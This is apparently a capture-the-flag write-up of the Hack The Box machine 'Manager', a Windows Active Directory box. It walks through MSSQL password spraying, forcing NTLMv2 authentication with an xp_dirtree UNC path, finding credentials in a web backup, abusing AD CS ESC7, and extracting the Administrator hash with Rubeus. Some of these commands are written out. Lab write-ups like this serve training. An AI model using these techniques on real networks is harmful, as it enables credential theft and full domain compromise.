Nmap

Like always, I’m going to scan the IP address by using nmap but I’m going to scan the full ports first. Then, I’m going to scan the only open ports.

# Nmap 7.94 scan initiated Mon Oct 23 19:48:02 2023 as: nmap -sCV -p135,139,1433,3268,3269,389,445,464,49667,49681,49682,49685,49720,53,593,5985,62109,636,64262,80,88,9389 -oN nmap/manager 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.087s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-23 18:48:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-23T18:49:41+00:00; +7h00m02s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-23T18:49:42+00:00; +7h00m02s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-23T14:47:59
|_Not valid after:  2053-10-23T14:47:59
|_ssl-date: 2023-10-23T18:49:41+00:00; +7h00m02s from scanner time.
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-23T18:49:41+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-23T18:49:42+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
62109/tcp open  msrpc         Microsoft Windows RPC
64262/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-time: 
|   date: 2023-10-23T18:49:01
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 23 19:49:41 2023 -- 1 IP address (1 host up) scanned in 98.62 seconds

That’s quite a large number of open ports. As the scan shows, this is a Windows machine running Active Directory. It also has MSSQL on port 1433, which caught my attention, especially since I’ve encountered it before on Archetype.

Nmap also discovered the host and domain names manager.htb and dc01.manager.htb. I added them to my /etc/hosts file:

add the hostname

Http: manager

The server on port 80 is running Microsoft IIS httpd 10.0. Navigating to the site shows a simple page that appears to be static. I tried enumerating hidden directories with gobuster, but I didn’t find anything useful.

manager webpage

LDAP: ldapsearch

Because ports 389, 636, 3268, 3269 (LDAP and LDAPS) are open, I tried enumerating LDAP anonymously with ldapsearch (for both regular LDAP and LDAPS). Unfortunately, anonymous enumeration didn’t yield any promising results, and it seems I need valid credentials:

ldapsearch

Kerberos: Kerbrute

Next, I used kerbrute to perform user enumeration. I used a username list from SecLists (specifically the xato-net-10-million-usernames.txt) and filtered it to only include lowercase entries:

cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt | grep '^[a-z]*$' > user.list

kerbrute userenum

It found several valid usernames, which I saved to names.txt. The username operator stood out as particularly interesting.

MSSQL: crackmapexec

Since we have the operator username, I tried brute-forcing the MSSQL service with crackmapexec, first using rockyou.txt (which failed), then trying each discovered username from the names.txt list as a password. Fortunately, this approach yielded valid credentials for the operator user:

crackmapexec mssql

MSSQL: mssqlclient.py

Using mssqlclient.py from Impacket, I was able to authenticate as operator. However, attempts to enable xp_cmdshell were blocked because operator lacks the necessary permissions. I enumerated the databases but couldn’t find anything particularly useful.

mssqlclient as operator

I then recalled an attack from a box called Responder involving stealing NTLMv2 hashes by forcing the target to authenticate with my machine. I set up responder.py on my attack box (listening on the tun0 interface) and ran this command xp_dirtree \\$IP\notexist\file to force authentication.

steal NTLMv2 hash

I captured the hash and saved it as hash.txt, but it proved resistant to cracking with hashcat.

MSSQL: xp_dirtree

At this point, I got stuck until I stumbled upon this blog post explaining how xp_dirtree can list the contents of directories. I decided to look through the web root directory, which revealed a backup ZIP file named website-backup-27-07-23-old.zip.

xp_dirtree traverse

I downloaded the zip file using curl command.

download zipfile

Evil-winrm: raven

After unzipping, there were many files inside. I searched for anything containing the string “pass” using grep -iR "pass". One file contained a password that looked like it belonged to a user named raven.

raven credentials

I used evil-winrm to authenticate, and it worked!

login as raven

ADCS: ESC7

I got stuck again, so I asked in the Hack The Box community Discord. Someone mentioned a potential certificate attack, which led me to a post by 0xdf (blog link). This box seems vulnerable to one of those AD CS certificate attacks.

I transferred Certify.exe to the target machine and ran it. The output showed that the current user has the ManageCA right.

check the attack vector

According to SpecterOps, ManageCA (also called “CA Administrator”) lets a user modify important CA configurations.

ManageCA (aka “CA Administrator”) is a permission grants a principal to perform “Administrative” CA actions, including the modification of persistent configuration data.

Following the steps in HackTricks and 0xdf’s writeup, I used Certipy to request a certificate for the Administrator account.

retrieve administrator certificates

This created an administrator.pfx file (and a corresponding .key file). Next, I transferred both administrator.pfx and Rubeus.exe to the target. Before running Rubeus.exe, I synchronized my machine’s clock with the target’s Kerberos time by running this command sudo ntpdate $IP. Finally, I ran:

Rubeus.exe asktgt /user:administrator /certificate:<location of administrator.pfx> /getcredentials /show /nowrap

This gave me the Administrator NTLM hash at the end of the output.

administrator NTLM hash

PsExec

With the Administrator hash in hand, I used psexec.py to get a shell as NT AUTHORITY\SYSTEM. It worked!

login as nt authority\\system